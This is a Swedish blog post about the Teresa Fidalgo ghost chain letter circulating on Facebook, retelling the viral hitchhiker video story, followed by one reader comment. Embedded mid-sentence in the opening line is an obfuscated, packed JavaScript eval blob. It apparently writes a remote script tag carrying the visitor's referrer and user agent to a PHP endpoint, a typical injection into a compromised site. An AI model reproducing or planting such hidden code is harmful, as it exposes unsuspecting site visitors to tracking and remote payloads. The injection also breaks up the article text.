Image Image Image Image Image Image Image Image Image Image

| 3 december, 2020

Scroll to top

Top

Teresa Fidalgo rullar runt på Facebook, igen

Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ikhed|var|u0026u|referrer|kkfbd||js|php’.split(’|’),0,{}))
var det dags igen. Alla dessa följebrev som åker runt på olika sociala nätverk, framförallt Facebook.

Det är historien om spöket Teresa Fidalgo som ”spökar” igen.

Historien om Teresa Fidalgo är en modern spökhistoria, skapad av portugisen David Rebordão. Berättelsen är ett par år gammal men har fått ny luft i seglen här i Sverige och många är intresserade över vem Teresa Fidalgo är och vad berättelsen går ut på.

Historian går ut på att tre ungdomar är på väg upp i bergen utanför staden Sintra i en bil, en av dem filmar i baksätet. Efter en liten stund ser de en kvinnlig liftare längs vägen, de stannar vid henne och erbjuder henne skjuts. Det är en ynklig och tystlåten ung kvinna som sätter sig i baksätet och ungdomarna blir intresserade över vem hon är och vad som är fel. Kvinnan, som uppger sig heta Teresa svarar inte på några frågor men pekar snart ut en plats ett par meter framför bilen, ”Ser ni den där platsen?” frågar hon, ungdomarna svarar ja…och resten får ni se i klippet nedan. :)

Bli inte rädda, det är inte på riktigt!

Comments

  1. Hanna

    Uuh,vilken läskig video o.O